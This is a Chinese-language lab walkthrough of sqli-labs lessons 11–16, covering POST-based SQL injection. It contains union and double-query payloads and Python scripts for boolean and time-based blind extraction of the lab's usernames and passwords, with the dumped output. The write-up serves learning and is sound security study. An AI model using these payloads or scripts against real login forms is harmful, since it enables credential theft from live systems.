LESS 11 基于字符串的注入(POST)
在username栏输入单引号’测试,结果:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’’’ and password=’’ LIMIT 0,1’ at line 1
猜测查询语句为:select * from users where username = ‘$username’ and password=’$password’ LIMIT 0,1
于是乎构造payload:
Username : 0’ union select group_concat(username),group_concat(password) from users#
Password :
结果:
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
LESS 12 基于双引号字符串的注入(POST)
和上一关的不同在于字符串被双引号和括号包围,通过报错讯息可以知道
payload如下:
Username : 0”) union select group_concat(username),group_concat(password) from users#
Password :
LESS 13 双查询注入(POST)
通过报错信息可以知道字符串被一对单引号和一对括号包围,但是成功后不显示信息,只会显示报错信息,于是使用双查询注入:
Username : 0’) union select count(), CONCAT_WS(CHAR(32,58,32),(select count() from users),floor(rand()*2)) as a from users group by a#
Password :
结果:
Duplicate entry ‘13 : 1’ for key ‘group_key’’
可以构造脚本爆表:
from urllib import request
from urllib import parse
import re
url = "http://localhost/sqli-labs-master/Less-13/"
i = 0
while(i < 13):
data = {"uname":"0') union select count(*), CONCAT_WS(CHAR(32,124,32),(select username from users limit "+str(i)+",1),(select password from users limit "+str(i)+",1),floor(rand()*2)) as a from users group by a#", "passwd":""}
response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
info = re.search(r"[^']+\s\|\s[^\s]+?", response)
if(info == None):
i -= 1
else:
print(info.group())
i += 1
|
结果:
Dumb | Dumb | 0
Angelina | I-kill-you | 1
Dummy | p@ssword | 0
secure | crappy | 1
stupid | stupidity | 1
superman | genious | 0
batman | mob!le | 1
admin | admin | 0
admin1 | admin1 | 0
admin2 | admin2 | 1
admin3 | admin3 | 1
dhakkan | dumbo | 1
admin4 | admin4 | 0
LESS 14 双引号双查询注入(POST)
除了把单引号括号改成双引号外和上一关没什么区别,payload:
Username : 0” union select count(), CONCAT_WS(CHAR(32,58,32),(select count() from users),floor(rand()*2)) as a from users group by a#
Password :
其他的和十三关都是一样的
LESS 15 基于布尔的盲注(POST)
POST盲注,第七关的脚本拿过来改一下即可:
from urllib import request
from urllib import parse
import re
url = "http://localhost/sqli-labs-master/Less-15/"
def getLength(value):
length = 0
while True:
data = {"uname":"' or length("+str(value)+")="+str(length)+"#", "passwd":""}
response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
if (re.search("slap", response)):
length += 1
else:
return length
def getName(value):
dbname = ""
for n in range(getLength(value)):
a = 64
b = 64
#使用二分法构造动态参数
while True:
b = int(b/2)
data = {"uname":"' or ascii(substr(" + value + "," + str(n+1) + "))<" + str(a) + "#", "passwd":""}
response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
if (re.search("slap", response)):
data["uname"] = "' or ascii(substr(" + value + "," + str(n+1) + "))=" + str(a) + "#"
response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
if (re.search("slap", response)):
a += b
else:
dbname = dbname + chr(a)
break
else:
a -= b
return dbname
print(getName("(select group_concat(username) from users)"))
print(getName("(select group_concat(password) from users)"))
|
结果和第八关一样
LESS 16 基于时间的盲注(POST)
结合第九关的脚本,再改一下上一关的脚本就成了本关的脚本:
from urllib import request
from urllib import parse
import time
url = "http://localhost/sqli-labs-master/Less-15/"
def getLength(value):
length = 0
while True:
data = {"uname":"' or if(length("+value+")="+str(length)+",sleep(0.1),1)#", "passwd":""}
t = time.time()
request.urlopen(url, parse.urlencode(data).encode()).read().decode()
if (time.time()-t <= 0.1):
length += 1
else:
return length
def getName(value):
dbname = ""
for n in range(getLength(value)):
a = 64
b = 64
#使用二分法构造动态参数
while True:
b = int(b/2)
data = {"uname":"' or if(ascii(substr("+value+","+str(n+1)+"))<"+str(a)+",sleep(0.1),1)#", "passwd":""}
t = time.time()
request.urlopen(url, parse.urlencode(data).encode()).read().decode()
if (time.time()-t <= 0.1):
data["uname"] = "' or if(ascii(substr("+value+","+str(n+1)+"))="+str(a)+",sleep(0.1),1)#"
t = time.time()
request.urlopen(url, parse.urlencode(data).encode()).read().decode()
if (time.time()-t <= 0.1):
a += b
else:
dbname = dbname + chr(a)
break
else:
a -= b
return dbname
print(getName("(select group_concat(username) from users)"))
print(getName("(select group_concat(password) from users)"))
|
速度太慢,不知道有什么好的改进方法